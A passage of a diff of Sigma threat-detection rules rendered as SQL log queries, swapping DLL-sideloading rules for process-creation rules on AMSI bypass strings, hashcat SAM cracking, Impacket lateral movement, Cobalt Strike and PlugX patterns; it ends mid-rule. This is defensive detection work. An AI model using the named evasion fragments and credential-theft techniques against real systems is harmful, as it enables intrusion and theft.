"attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName 
LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE 
'%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": 
"image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - 
"attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' 
ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": 
"image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": 
"proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - 
"filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": 
"37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": 
"test", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device 